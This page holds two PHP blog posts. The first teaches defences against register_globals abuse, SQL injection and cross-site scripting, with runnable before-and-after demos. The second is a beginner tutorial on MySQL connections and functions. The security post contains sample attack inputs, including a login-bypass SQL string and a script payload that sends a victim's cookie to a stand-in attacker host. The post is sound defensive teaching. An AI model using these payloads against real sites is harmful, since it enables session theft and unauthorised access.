Posted by: Shofiur Rahman

Posted on: July 11, 2012 4:13 pm

-

Attackers discover new exploits and techniques every day, but several of the most common categories of attack can be defended against directly in our PHP code and configuration. This post covers three of them: register_globals abuse, SQL injection and cross-site scripting.

Abusing register_globals

register_globals is a setting in php.ini that controls whether PHP automatically creates a global variable for every request parameter (form field, query-string parameter or cookie) with the same name. With register_globals set to on, any variable your script forgets to initialise can be seeded by the client, which can be a disaster for your website.

Since PHP 4.2.0 the default value for register_globals has been off, and the setting was deprecated in PHP 5.3.0 and removed altogether in PHP 5.4.0. Web hosts running older versions, however, often re-enable register_globals to keep legacy scripts working. The following example makes the difference between on and off clear.

Suppose username is a form field. With register_globals off, the only way to read its value is through the $_POST or $_GET array, depending on the form's method. With register_globals on, the value is also available as a plain variable $username, created before a single line of your code runs. That is the danger: the client now controls the initial value of every variable you do not explicitly initialise, including flags such as $authorized or $is_admin.

If you are not able to disable register_globals in php.ini, you can turn it off with an .htaccess file (this works when PHP runs as an Apache module):

php_flag register_globals off
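To make the failure mode concrete, here is an added example (not code from the original post) that reproduces the classic register_globals bug without needing the setting at all. register_globals removed from PHP 5.4 onward, so the script does what the setting used to do at request start, namely turn every GET parameter into a global variable, by calling extract($_GET) on a constructed request. is_admin_session() is a hypothetical stand-in for a real session check; the code needs PHP 7.0 or later for the type declarations.

```php
<?php
// Added example, not from the original post: the classic register_globals
// pitfall (an uninitialised $authorized flag) and the hardened version.
// is_admin_session() is a hypothetical placeholder for a real session check.

function is_admin_session(): bool
{
    return false;   // the attacker has no admin session
}

// Constructed request: the attacker simply appends ?authorized=1 to the URL.
$_GET = ['authorized' => '1'];

// --- Vulnerable pattern (what register_globals=On did automatically) --------
// extract() imports every request key as a global variable, so after this
// line $authorized === '1' even though no code of ours ever assigned it.
extract($_GET);

if (is_admin_session()) {
    $authorized = true;            // never runs for the attacker...
}
if (!empty($authorized)) {        // ...yet this branch is taken, because the
    echo "VULNERABLE: admin panel shown\n";   // flag was seeded by the client
}

// --- Hardened pattern --------------------------------------------------------
// 1. Never extract() or otherwise auto-import request data into variables.
// 2. Initialise every security flag before use, so nothing can pre-seed it.
// 3. Read request data only through $_GET/$_POST and validate it explicitly.
$authorized = false;
if (is_admin_session()) {
    $authorized = true;
}
if ($authorized) {
    echo "admin panel shown\n";
} else {
    echo "HARDENED: access denied\n";
}

// Request parameters are read by name and validated, never treated as flags.
$page = filter_var($_GET['page'] ?? '1', FILTER_VALIDATE_INT);
if ($page === false || $page < 1) {
    $page = 1;
}
echo "page: $page\n";
```

Run it from the command line and the first block prints "VULNERABLE: admin panel shown" while the second prints "HARDENED: access denied". The same bug still exists today in any code that calls extract() or parse_str() on request data without the EXTR_SKIP flag, so the hardened rules apply regardless of the PHP version.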

SQL Injection Attacks

SQL injection is the inclusion of malicious SQL syntax in what should be inoffensive data, so that the attacker's input changes the structure of a query instead of being treated as a plain value. It preys on a lack of input validation and, above all, on queries assembled by concatenating user input into SQL strings.

SQL injection is avoidable with a little preparation and disciplined coding. If magic_quotes_gpc is enabled, PHP automatically backslash-escapes quotes, backslashes and NUL bytes in all GET, POST and cookie variables, regardless of whether they are ever used in a SQL statement. Besides being annoying (data has to be stripslashes()'d before any non-SQL use), it is not a real defence: magic quotes were deprecated in PHP 5.3.0 and removed in 5.4.0, and escaping that knows nothing about the connection's character set can be bypassed with multibyte sequences. So turn magic_quotes_gpc off in php.ini, but do not replace it with addslashes() either, which has the same blind spot. The reliable fix is to use prepared statements with bound parameters (PDO or mysqli), so that user data is sent separately from the SQL text and can never be parsed as part of it. Where you must build a query by hand with the legacy mysql extension, escape every value with mysql_real_escape_string() on the open connection immediately before it is interpolated, and quote it in the SQL.
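The following is an added example, not code from the original post, showing the injection described above next to the prepared-statement fix. It uses PDO with an in-memory SQLite database (the pdo_sqlite extension, which ships with most PHP builds) so it runs offline; against MySQL only the DSN would change to something like 'mysql:host=localhost;dbname=test' with a username and password, and the rest is identical. The users table, its two rows and the attacker's input are constructed for the demo, and passwords are stored in clear only to keep the example short.

```php
<?php
// Added example, not from the original post: string-built query vs. a
// prepared statement, run against a constructed in-memory SQLite database.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)');
$db->exec("INSERT INTO users (username, password) VALUES ('alice', 's3cret'), ('bob', 'hunter2')");

// Constructed attacker input: closes the open quote, adds an always-true
// condition and comments out the rest of the WHERE clause (the trailing
// space after -- matters for MySQL, which requires it).
$username = "' OR 1=1 -- ";
$password = 'anything';

// --- Vulnerable: request data interpolated straight into the SQL text ------
// The resulting statement is
//   SELECT COUNT(*) FROM users WHERE username = '' OR 1=1 -- ' AND password = 'anything'
// so the password check is gone and every row matches.
function loginVulnerable(PDO $db, string $u, string $p): int
{
    $sql = "SELECT COUNT(*) FROM users WHERE username = '$u' AND password = '$p'";
    return (int) $db->query($sql)->fetchColumn();
}

// --- Fixed: prepared statement; the input can only ever be a value ---------
// The SQL text is parsed first, then the values are bound, so the quotes
// and the -- in $u are just characters inside a string being compared.
function loginSafe(PDO $db, string $u, string $p): int
{
    $stmt = $db->prepare('SELECT COUNT(*) FROM users WHERE username = :u AND password = :p');
    $stmt->execute([':u' => $u, ':p' => $p]);
    return (int) $stmt->fetchColumn();
}

echo 'vulnerable: ', loginVulnerable($db, $username, $password), " row(s) match\n";   // 2
echo 'safe:       ', loginSafe($db, $username, $password), " row(s) match\n";         // 0
```

Note that the safe version needs no escaping at all; the same holds for mysqli_prepare() with bind_param(). Validation of the input (length, allowed characters) is still worth doing, but it is a second layer, not the defence itself.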

Cross-Site Scripting

Cross-site scripting, abbreviated XSS, is the abuse of unfiltered dynamic output, where the attacker is able to add to or change the page's generated markup. Most commonly this means injecting a small piece of JavaScript into the output of a page, which then does something malicious, such as tricking another user into revealing their login credentials or credit card details, or sending the victim's cookie or session identifier to the attacker for immediate account compromise. The defence is to escape every piece of untrusted data for the context it is output into; for text in the HTML body or inside a quoted attribute that means htmlspecialchars() with ENT_QUOTES and an explicit character set, applied at the moment of output rather than at input time.
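As an added example (not code from the original post), the script below reflects a constructed search parameter into HTML with and without output escaping. No web server or browser is needed: it prints the markup each version would send, so you can see that the script tag survives intact in the vulnerable output and becomes inert text in the escaped one. The evil.example host and the parameter name q are invented for the demo; the code needs PHP 5.4 or later for ENT_SUBSTITUTE and PHP 7.0 for the type declarations.

```php
<?php
// Added example, not from the original post: reflected XSS through an
// unescaped echo, and the fix with context-appropriate escaping.

// Constructed attacker input, as it would arrive in search.php?q=...
// It exfiltrates the session cookie to an attacker-controlled host.
$q = '<script>document.location="http://evil.example/?c="+document.cookie</script>';

// --- Vulnerable: raw request data dropped into the HTML body -----------------
function renderVulnerable(string $q): string
{
    return "<p>Results for: $q</p>";
}

// --- Fixed: escape for the HTML context at the moment of output --------------
// ENT_QUOTES escapes both " and ' so the value is also safe inside quoted
// attributes; ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an
// empty string; naming the charset prevents multibyte-based bypasses.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function renderSafe(string $q): string
{
    return '<p>Results for: ' . e($q) . '</p>';
}

// Attribute context: the value must be escaped AND the attribute quoted,
// otherwise a space in the input starts a new attribute such as onmouseover.
function renderInput(string $q): string
{
    return '<input type="text" name="q" value="' . e($q) . '">';
}

echo renderVulnerable($q), "\n";   // <script>...</script> reaches the browser and runs
echo renderSafe($q), "\n";         // &lt;script&gt;... is displayed as harmless text
echo renderInput($q), "\n";        // value="&lt;script&gt;..." cannot break out of the attribute
```

htmlspecialchars() is the right tool for HTML text and attribute values only. Data placed inside a JavaScript block, a URL or a CSS rule needs the escaping rules of that context, and values destined for an href should additionally be checked for a safe scheme (http or https), since encoding does nothing against a javascript: URL.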

Posted by: SEO Positive

Posted on: May 12, 2010 8:46 am

-

Today we are going to expand on PHP variables, introduce the define() function, and touch base with MySQL by getting you connected to a database.

The requirements for today's tutorial are:

  • PHP Server with PHP 5+
  • MySQL access with all privileges
  • Testing platform (Virtual Server, PHP Hosting)
  • Text authoring software to edit your files

As usual all code can be downloaded via the link at the bottom of the post.

MySQL Code

<?php
// Note: the mysql_* functions used here were deprecated in PHP 5.5 and removed
// in PHP 7.0; on current PHP use mysqli or PDO with the same two-connection idea.
// The credentials below are the tutorial's placeholders; substitute your own.

// Resource one: connect as user 'test' and select the 'test' database
$connect1 = mysql_connect('localhost', 'test', 'test');
if (!$connect1) {
    die('Could not connect (resource one): ' . mysql_error());
}
mysql_select_db('test', $connect1);

// Resource two: a second, independent connection as user 'test2'
// (the original post mistakenly called a non-existent mysql() function here)
$connect2 = mysql_connect('localhost', 'test2', 'test2');
if (!$connect2) {
    die('Could not connect (resource two): ' . mysql_error());
}
mysql_select_db('test2', $connect2);

// Simple query using resource #1
$result1 = mysql_query("SELECT * FROM `test`", $connect1);

// Simple query using resource #2; passing the link picks which connection runs it
$result2 = mysql_query("SELECT * FROM `test2`", $connect2);

PHP Function

<?php
// Returns a different message depending on the argument passed in
function feedMe($food)
{
	if ($food == 'cookies')
	{
		return 'Yummy thank you very much for the cookie';
	}
	else
	{
		// curly-brace syntax interpolates the variable inside the double-quoted string
		return "Yuk! I don't like {$food}, I want cookies.";
	}
}

// feed me apples
echo feedMe('apples');
// will output: Yuk! I don't like apples, I want cookies.

// feed me cookies
echo feedMe('cookies');
// will output: Yummy thank you very much for the cookie

Download Zipped Source

Tomorrow we will look at handling user input in PHP and XHTML using the POST and GET methods.
